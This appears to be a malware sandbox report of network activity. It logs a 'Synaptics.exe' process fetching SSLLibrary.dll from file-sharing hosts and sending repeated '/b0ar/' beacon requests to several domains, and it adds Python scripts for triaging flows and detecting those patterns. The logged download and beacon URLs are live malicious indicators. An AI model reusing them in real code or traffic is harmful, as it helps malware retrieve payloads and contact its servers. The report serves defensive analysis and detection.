Network Analysis
IP Address | Status |
---|---|
104.19.185.120 | Active |
104.74.219.56 | Active |
153.92.0.100 | Active |
162.125.84.18 | Active |
164.124.101.2 | Active |
172.217.26.14 | Active |
34.102.136.180 | Active |
34.80.190.141 | Active |
69.42.215.252 | Active |
72.52.178.23 | Active |
99.83.154.118 | Active |
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.102:49185 | 104.19.185.120:443 | www.000webhost.com |
192.168.56.102:49171 | 104.74.219.56:80 | www.mcinerneychrysler.com |
192.168.56.102:49184 | 153.92.0.100:80 | xred.site50.net |
192.168.56.102:49183 | 162.125.84.18:443 | www.dropbox.com |
192.168.56.102:49182 | 172.217.26.14:443 | docs.google.com |
192.168.56.102:49168 | 34.102.136.180:80 | www.livingalcohol.com |
192.168.56.102:49169 | 34.102.136.180:80 | www.livingalcohol.com |
192.168.56.102:49180 | 34.80.190.141:80 | www.algarmotorcars.com |
192.168.56.102:49177 | 69.42.215.252:80 | freedns.afraid.org |
192.168.56.102:49176 | 72.52.178.23:80 | www.vnielvmdqxk538.xyz |
192.168.56.102:49170 | 99.83.154.118:80 | www.thepink.club |
Note that www.artjohntravis.com, which is contacted in the HTTP log below, has no row of its own here: 34.102.136.180 carries two connections but is labelled with a single host name, so the Host column should be read as the sandbox's name for the destination address, not as the Host header of each request.
UDP Requests
Source | Destination | Service |
---|---|---|
192.168.56.102:52062 | 164.124.101.2:53 | DNS |
192.168.56.102:52336 | 164.124.101.2:53 | DNS |
192.168.56.102:54322 | 164.124.101.2:53 | DNS |
192.168.56.102:58838 | 164.124.101.2:53 | DNS |
192.168.56.102:61115 | 164.124.101.2:53 | DNS |
192.168.56.102:63780 | 164.124.101.2:53 | DNS |
192.168.56.102:64034 | 164.124.101.2:53 | DNS |
192.168.56.102:64472 | 164.124.101.2:53 | DNS |
192.168.56.102:64995 | 164.124.101.2:53 | DNS |
192.168.56.102:137 | 192.168.56.255:137 | NetBIOS name service (broadcast) |
192.168.56.102:138 | 192.168.56.255:138 | NetBIOS datagram (broadcast) |
192.168.56.102:49152 | 239.255.255.250:3702 | WS-Discovery (multicast) |
192.168.56.102:49164 | 239.255.255.250:1900 | SSDP (multicast) |
8.8.8.8:53 | 192.168.56.102:51955 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:52001 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:53291 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:55113 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:58020 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:58508 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:59731 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:61115 | DNS (reply direction) |
8.8.8.8:53 | 192.168.56.102:63780 | DNS (reply direction) |
The NetBIOS, SSDP and WS-Discovery entries are standard Windows guest discovery traffic and are not attributable to the sample. Entries with 8.8.8.8:53 as the source are reply-direction flows (the first packet seen came from the resolver). Two of them reuse the client ports of queries sent to 164.124.101.2 (61115 and 63780), so they are most likely the same transactions answered from a different address, for example DNS rewritten on the sandbox gateway, rather than the sample contacting 8.8.8.8 directly.
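The flow tables above can be triaged mechanically. The script below is an added example and not part of the sandbox report: it parses lines of the form `proto src:port dst:port [host]` (a constructed subset of the listing above), separates guest discovery noise from external contacts, and matches reply-direction DNS flows back to the query that opened the client port, which is how the 8.8.8.8 entries on ports 61115 and 63780 are tied to the queries sent to 164.124.101.2. `SANDBOX_HOST`, `LOCAL_NOISE_PORTS` and the input line format are this example's own assumptions.

```python
"""Triage of a Cuckoo-style TCP/UDP flow listing.

Added example; not part of the original report. The sample lines are constructed
from the TCP and UDP tables above ("proto src:port dst:port [host]").
"""
import ipaddress
from collections import defaultdict

SANDBOX_HOST = ipaddress.ip_address("192.168.56.102")   # assumed guest address

# Broadcast/multicast discovery that every Windows guest emits regardless of the sample.
LOCAL_NOISE_PORTS = {137, 138, 1900, 3702}

# Constructed sample (a subset of the listing above).
SAMPLE_FLOWS = """\
tcp 192.168.56.102:49185 104.19.185.120:443 www.000webhost.com
tcp 192.168.56.102:49168 34.102.136.180:80 www.livingalcohol.com
tcp 192.168.56.102:49169 34.102.136.180:80 www.livingalcohol.com
tcp 192.168.56.102:49184 153.92.0.100:80 xred.site50.net
udp 192.168.56.102:52062 164.124.101.2:53
udp 192.168.56.102:61115 164.124.101.2:53
udp 192.168.56.102:63780 164.124.101.2:53
udp 192.168.56.102:137 192.168.56.255:137
udp 192.168.56.102:49152 239.255.255.250:3702
udp 192.168.56.102:49164 239.255.255.250:1900
udp 8.8.8.8:53 192.168.56.102:51955
udp 8.8.8.8:53 192.168.56.102:61115
udp 8.8.8.8:53 192.168.56.102:63780
"""


def parse_flow(line):
    """'udp 1.2.3.4:53 5.6.7.8:1234 [host]' -> dict of typed fields."""
    proto, src, dst, *rest = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {
        "proto": proto,
        "src": ipaddress.ip_address(sip), "sport": int(sport),
        "dst": ipaddress.ip_address(dip), "dport": int(dport),
        "host": rest[0] if rest else None,
    }


def is_local_noise(flow):
    """NetBIOS/SSDP/WS-Discovery sent to a broadcast or multicast address."""
    dst = flow["dst"]
    return flow["dport"] in LOCAL_NOISE_PORTS and (dst.is_multicast or dst.is_private)


def triage(text):
    """Split flows into external contacts, DNS queries, local noise and reply-direction
    entries, then match reply-direction DNS flows to the query that opened the port."""
    external = defaultdict(set)   # (dst, dport) -> host names the sandbox associated
    dns_queries = {}              # guest ephemeral port -> resolver the query was sent to
    noise, reply_dir = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = parse_flow(line)
        if f["src"] == SANDBOX_HOST:
            if is_local_noise(f):
                noise.append(f)
            elif f["dport"] == 53:
                dns_queries[f["sport"]] = f["dst"]
            else:
                external[(str(f["dst"]), f["dport"])].add(f["host"])
        elif f["dst"] == SANDBOX_HOST:
            reply_dir.append(f)   # first packet seen came from outside the guest

    # A DNS reply that reuses the client port of a query sent to a different resolver is
    # the same transaction answered from another address (DNS rewritten on the sandbox
    # path), not evidence that the sample contacted that resolver itself.
    rewritten, unmatched = [], []
    for f in reply_dir:
        if f["sport"] != 53:
            continue
        queried = dns_queries.get(f["dport"])
        if queried is None:
            unmatched.append(f["dport"])
        elif queried != f["src"]:
            rewritten.append((f["dport"], str(queried), str(f["src"])))
    return {
        "external": {k: sorted(h for h in v if h) for k, v in external.items()},
        "dns_resolvers": sorted({str(r) for r in dns_queries.values()}),
        "noise": len(noise),
        "dns_rewritten": rewritten,
        "dns_unmatched": sorted(unmatched),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_FLOWS).items():
        print(f"{key}: {value}")
```

Run as-is it reports one resolver actually queried by the guest (164.124.101.2), two rewritten DNS transactions and one reply whose query is not in the sample; on the full listing the `dns_unmatched` list is where to look for resolver replies the guest never sent a query for.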
HTTP Requests
GET 404 https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Request:
GET /uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
x-chromium-appcache-fallback-override: disallow-fallback
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'report-sample' 'nonce-SrkI3al6274QNK0E4lalFA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
Date: Thu, 02 Sep 2021 00:16:24 GMT
Expires: Thu, 02 Sep 2021 00:16:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Set-Cookie: NID=222=vjQSRo1aEc3IkM3otg0b0XP0SoJ3vdx8rD-NQUy9VZx_nH_-XS4hJhsiPmOgyWnH3dnlzw00NDzEP_GhFCCZXUsLi4ixHfgqIHbaICAjWakxLMFBGZSzU7Lj-0F-vvl-k5JVVYCflWZygtTNATJycrQZMR4r2pYnGGf3HniDSho; expires=Fri, 04-Mar-2022 00:16:24 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

GET 301 https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Request:
GET /s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 HTTP/1.1
User-Agent: Synaptics.exe
Host: www.dropbox.com
Cache-Control: no-cache
Response:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache,no-cache, no-store
Content-Security-Policy: sandbox
Location: /s/dl/fzj752whr3ontsm/SSLLibrary.dll
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: gvc=MTIxMzE4MDQyMzg4NzEzMDMzNjk2NjMxODUwMzc4OTcxMDg2Nzky; expires=Tue, 01 Sep 2026 00:16:25 GMT; HttpOnly; Path=/; Secure
Set-Cookie: t=om_PBxMIuGBGyA2-h2zjFyDA; Domain=dropbox.com; expires=Sun, 01 Sep 2024 00:16:25 GMT; HttpOnly; Path=/; Secure
Set-Cookie: __Host-js_csrf=om_PBxMIuGBGyA2-h2zjFyDA; expires=Sun, 01 Sep 2024 00:16:25 GMT; Path=/; Secure
Set-Cookie: locale=en; Domain=dropbox.com; expires=Tue, 01 Sep 2026 00:16:25 GMT; Path=/; Secure
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow, noimageindex
X-Xss-Protection: 1; mode=block
Content-Type: text/html; charset=utf-8
Accept-Encoding: identity,gzip
Date: Thu, 02 Sep 2021 00:16:25 GMT
Server: envoy
Strict-Transport-Security: max-age=31536000; includeSubDomains
Strict-Transport-Security: max-age=31536000; includeSubDomains
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Vary: Accept-Encoding
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: 3edb699334d545a58f635bf793b00422
Transfer-Encoding: chunked

GET 404 https://www.dropbox.com/s/dl/fzj752whr3ontsm/SSLLibrary.dll
Request:
GET /s/dl/fzj752whr3ontsm/SSLLibrary.dll HTTP/1.1
User-Agent: Synaptics.exe
Host: www.dropbox.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: gvc=MTIxMzE4MDQyMzg4NzEzMDMzNjk2NjMxODUwMzc4OTcxMDg2Nzky; __Host-js_csrf=om_PBxMIuGBGyA2-h2zjFyDA; t=om_PBxMIuGBGyA2-h2zjFyDA; locale=en
Response:
HTTP/1.1 404 Not Found
Content-Security-Policy: sandbox allow-forms allow-scripts
Content-Type: text/html
Accept-Encoding: identity,gzip
Date: Thu, 02 Sep 2021 00:16:25 GMT
Server: envoy
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 1144
Strict-Transport-Security: max-age=31536000; includeSubDomains
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Cache-Control: no-cache, no-store
Vary: Accept-Encoding
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: cb3b869b748f41bcbc96a41e622d631e

GET 403 https://www.000webhost.com/migrate?static=true
Request:
GET /migrate?static=true HTTP/1.1
User-Agent: Synaptics.exe
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.000webhost.com
Response:
HTTP/1.1 403 Forbidden
Date: Thu, 02 Sep 2021 00:16:26 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 68828cb48da012de-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET 403 http://www.livingalcohol.com/b0ar/?r6=32cJvtm6v5CrHkGtRaCKvnIzMPMaS8klC7QMWGugGRjVzPiNEaTJc2oUIDqYaKdywZUrkA7f&sBZxr2=FxopsJeXPvOX3
Request:
GET /b0ar/?r6=32cJvtm6v5CrHkGtRaCKvnIzMPMaS8klC7QMWGugGRjVzPiNEaTJc2oUIDqYaKdywZUrkA7f&sBZxr2=FxopsJeXPvOX3 HTTP/1.1
Host: www.livingalcohol.com
Connection: close
Response:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 02 Sep 2021 00:15:43 GMT
Content-Type: text/html
Content-Length: 275
ETag: "612d4fd4-113"
Via: 1.1 google
Connection: close

GET 403 http://www.artjohntravis.com/b0ar/?r6=FI6V3ciXB53f+evAnSijLVseR7Fj9SHqs11tijwh7SEaqCYqOPT9yA6Mp0JLeXWl2GeMTJcV&sBZxr2=FxopsJeXPvOX3
Request:
GET /b0ar/?r6=FI6V3ciXB53f+evAnSijLVseR7Fj9SHqs11tijwh7SEaqCYqOPT9yA6Mp0JLeXWl2GeMTJcV&sBZxr2=FxopsJeXPvOX3 HTTP/1.1
Host: www.artjohntravis.com
Connection: close
Response:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 02 Sep 2021 00:15:48 GMT
Content-Type: text/html
Content-Length: 275
ETag: "612d4fd4-113"
Via: 1.1 google
Connection: close

GET 403 http://www.thepink.club/b0ar/?r6=35zmK/1nOG3ZiclOaRDNqBcycOB07sOwoO1SOSl9YfrEiskurZgjdyrE07vb97UKsZwkKKa4&sBZxr2=FxopsJeXPvOX3
Request:
GET /b0ar/?r6=35zmK/1nOG3ZiclOaRDNqBcycOB07sOwoO1SOSl9YfrEiskurZgjdyrE07vb97UKsZwkKKa4&sBZxr2=FxopsJeXPvOX3 HTTP/1.1
Host: www.thepink.club
Connection: close
Response:
HTTP/1.1 403 Forbidden
Date: Thu, 02 Sep 2021 00:15:59 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Server: nginx
Vary: Accept-Encoding

GET 301 http://www.mcinerneychrysler.com/b0ar/?r6=oBVrEuqKUfopUpAnqJfem3AP4MxLKUs3kUwU0NiQ7+oE8UvVtrvEXTcSUGgYTlPvZxyytEEp&sBZxr2=FxopsJeXPvOX3
Request:
GET /b0ar/?r6=oBVrEuqKUfopUpAnqJfem3AP4MxLKUs3kUwU0NiQ7+oE8UvVtrvEXTcSUGgYTlPvZxyytEEp&sBZxr2=FxopsJeXPvOX3 HTTP/1.1
Host: www.mcinerneychrysler.com
Connection: close
Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Cache-Control: no-store
Location: https://www.mcinerneychrysler.com/b0ar/?r6=oBVrEuqKUfopUpAnqJfem3AP4MxLKUs3kUwU0NiQ7+oE8UvVtrvEXTcSUGgYTlPvZxyytEEp&sBZxr2=FxopsJeXPvOX3
Content-Length: 0
Date: Thu, 02 Sep 2021 00:16:14 GMT
Connection: close
Set-Cookie: JSESSIONID=58A540248AF0A901E7A137ABAED4ACC7; Path=/; HttpOnly
Set-Cookie: locale=en_US; Max-Age=2592000; Expires=Sat, 02-Oct-2021 00:16:13 GMT; Path=/
Server-Timing: cdn-cache; desc=MISS
Server-Timing: edge; dur=8582
Server-Timing: origin; dur=171

GET (no response recorded) http://www.vnielvmdqxk538.xyz/b0ar/?r6=7CUt39hPMjg/s6qQ0+QbWtikgyOufco6CG9l+t5DjC9/JIPCU/WxQ6IAIg/iVENqz91MlH14&sBZxr2=FxopsJeXPvOX3
Request:
GET /b0ar/?r6=7CUt39hPMjg/s6qQ0+QbWtikgyOufco6CG9l+t5DjC9/JIPCU/WxQ6IAIg/iVENqz91MlH14&sBZxr2=FxopsJeXPvOX3 HTTP/1.1
Host: www.vnielvmdqxk538.xyz
Connection: close

GET 200 http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Request:
GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Sep 2021 00:16:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS

GET 301 http://www.algarmotorcars.com/b0ar/?r6=GBw5w5TP0zGw7Ui1KyuWLvjFNgn/VJyG24akOFBAUZbsXTnWiW1DuuZdfbFm7e75UOMWX9j4&sBZxr2=FxopsJeXPvOX3
Request:
GET /b0ar/?r6=GBw5w5TP0zGw7Ui1KyuWLvjFNgn/VJyG24akOFBAUZbsXTnWiW1DuuZdfbFm7e75UOMWX9j4&sBZxr2=FxopsJeXPvOX3 HTTP/1.1
Host: www.algarmotorcars.com
Connection: close
Response:
HTTP/1.1 301 Moved Permanently
Date: Thu, 02 Sep 2021 00:16:17 GMT
Content-Length: 0
Connection: close
location: https://www.algarmotorcars.com/b0ar?r6=GBw5w5TP0zGw7Ui1KyuWLvjFNgn%2FVJyG24akOFBAUZbsXTnWiW1DuuZdfbFm7e75UOMWX9j4&sBZxr2=FxopsJeXPvOX3
strict-transport-security: max-age=120
x-wix-request-id: 1630541777.4995879943432555
Age: 0
Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=ae1
X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVhUpRT7gI5lpwC6VO/sUbfq,m0j2EEknGIVUW/liY8BLLvkiKiU38sRrmK2XwMFvFO0sxHMvs66Scc9GzPdq8oXa,2d58ifebGbosy5xc+FRalv/NbHAaASdVtck3qNT35XeYaj3xMADOV7bV+RwYs6XCt9ixLqdDyDHNl7JhEyPjXCowlimqXXRZThBA8XBqMGs=,2UNV7KOq4oGjA5+PKsX47Mci82Q35Aqg07TRfNbLwJRYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,xXLsLbWEHLk6hl9EcGlmxi99IURIKYYksPnccM1rNOA=,yQPRWbhuDep69mmCOG99v0nNHKvBrVwxEcBNhuP7NEs0xla9SbmtsDu065Hzj+uVd3MtMILCY4OR2GCMuJS3fA==
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Server: Pepyaka/1.19.10

GET 301 http://xred.site50.net/syn/SSLLibrary.dll
Request:
GET /syn/SSLLibrary.dll HTTP/1.1
User-Agent: Synaptics.exe
Host: xred.site50.net
Cache-Control: no-cache
Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 02 Sep 2021 00:16:26 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://www.000webhost.com/migrate?static=true
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
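The request dumps above share a few observable traits: the same `/b0ar/` path and the same trailing `sBZxr2=FxopsJeXPvOX3` parameter sent to six unrelated hosts with no User-Agent and `Connection: close`; binaries fetched from file-sharing services under a User-Agent that is just the process name; and a dynamic-DNS API call. The script below is an added example, not part of the report, that runs those checks over a constructed record list built from the exchanges above (the `r6` values are shortened placeholders; the User-Agent and extension heuristics are the example's own, not the sandbox's).

```python
"""Pattern checks over a sandbox HTTP request log.

Added example; not part of the original report. Records are constructed from the
request dumps above; the long r6 values are shortened placeholders, and the heuristics
(no '/' in the User-Agent, payload extensions, direct-download query keys) are this
example's own.
"""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# (method, url, request headers). Constructed from the exchanges above.
SAMPLE_REQUESTS = [
    ("GET", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download",
     {"User-Agent": "Synaptics.exe", "Cache-Control": "no-cache"}),
    ("GET", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1",
     {"User-Agent": "Synaptics.exe", "Cache-Control": "no-cache"}),
    ("GET", "http://xred.site50.net/syn/SSLLibrary.dll",
     {"User-Agent": "Synaptics.exe", "Cache-Control": "no-cache"}),
    ("GET", "http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978",
     {"User-Agent": "MyApp", "Cache-Control": "no-cache"}),
    ("GET", "http://www.livingalcohol.com/b0ar/?r6=AAAA1&sBZxr2=FxopsJeXPvOX3", {"Connection": "close"}),
    ("GET", "http://www.artjohntravis.com/b0ar/?r6=AAAA2&sBZxr2=FxopsJeXPvOX3", {"Connection": "close"}),
    ("GET", "http://www.thepink.club/b0ar/?r6=AAAA3&sBZxr2=FxopsJeXPvOX3", {"Connection": "close"}),
    ("GET", "http://www.mcinerneychrysler.com/b0ar/?r6=AAAA4&sBZxr2=FxopsJeXPvOX3", {"Connection": "close"}),
    ("GET", "http://www.vnielvmdqxk538.xyz/b0ar/?r6=AAAA5&sBZxr2=FxopsJeXPvOX3", {"Connection": "close"}),
    ("GET", "http://www.algarmotorcars.com/b0ar/?r6=AAAA6&sBZxr2=FxopsJeXPvOX3", {"Connection": "close"}),
]

PAYLOAD_EXTENSIONS = (".dll", ".exe", ".bin")   # heuristic list


def parse_request(method, url, headers):
    u = urlsplit(url)
    return {
        "method": method, "host": u.hostname, "path": u.path,
        "query": dict(parse_qsl(u.query, keep_blank_values=True)),
        "headers": {k.lower(): v for k, v in headers.items()},
    }


def find_fanout(requests, min_hosts=3):
    """Same path and the same (name, value) query parameter sent to many distinct hosts.
    Per-host 'r6' values all differ, so they never group; the static 'sBZxr2' does."""
    hosts_by_key = defaultdict(set)
    for r in requests:
        for name, value in r["query"].items():
            hosts_by_key[(r["path"], name, value)].add(r["host"])
    return {k: sorted(v) for k, v in hosts_by_key.items() if len(v) >= min_hosts}


def user_agent_finding(r):
    ua = r["headers"].get("user-agent")
    if ua is None:
        close = r["headers"].get("connection", "").lower() == "close"
        return "no User-Agent" + (", Connection: close" if close else "")
    if "/" not in ua:   # heuristic: browsers and real HTTP libraries send product/version tokens
        return f"non-browser User-Agent {ua!r}"
    return None


def download_finding(r):
    """Binary fetch by extension, or a file-sharing direct-download query (Drive, Dropbox)."""
    if r["path"].lower().endswith(PAYLOAD_EXTENSIONS):
        return r["path"]
    if r["query"].get("export") == "download" or r["query"].get("dl") == "1":
        return f"{r['path']} (direct-download query)"
    return None


def analyze(records):
    """Return findings grouped by category: fanout, user-agent, download."""
    requests = [parse_request(*rec) for rec in records]
    findings = defaultdict(list)
    for (path, name, value), hosts in find_fanout(requests).items():
        findings["fanout"].append(f"{path}?{name}={value} -> {len(hosts)} hosts: {', '.join(hosts)}")
    for r in requests:
        ua = user_agent_finding(r)
        if ua:
            findings["user-agent"].append(f"{r['host']}: {ua}")
        dl = download_finding(r)
        if dl:
            findings["download"].append(f"{r['host']}{dl}")
    return dict(findings)


if __name__ == "__main__":
    for category, items in analyze(SAMPLE_REQUESTS).items():
        print(category)
        for item in items:
            print("  " + item)
```

The fan-out check is the one worth keeping in a detection pipeline: a static query parameter repeated across many unrelated domains is visible at the proxy regardless of which of the hosts answer, whereas the responses here (403, 301, 404, no reply) show that most of the contacted domains are not serving anything and would be missed by response-based rules.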
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.102 | 164.124.101.2 | 3 (Destination Unreachable) | |
192.168.56.102 | 164.124.101.2 | 3 (Destination Unreachable) | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49183 -> 162.125.84.18:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=San Francisco, O=Dropbox, Inc, CN=*.dropbox.com | 3b:3c:24:9c:f2:3f:43:52:f1:1b:a4:f7:5d:18:a7:34:23:49:8f:7a |
TLSv1 192.168.56.102:49182 -> 172.217.26.14:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | 8f:b6:6e:35:48:00:39:39:d4:59:1a:58:7b:b6:38:5a:92:b0:b6:9f |
TLSv1 192.168.56.102:49185 -> 104.19.185.120:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.000webhost.com | 89:ac:2f:41:6f:58:00:a2:08:f3:6f:fd:5a:5e:15:8c:39:20:d8:99 |
Snort Alerts
No Snort Alerts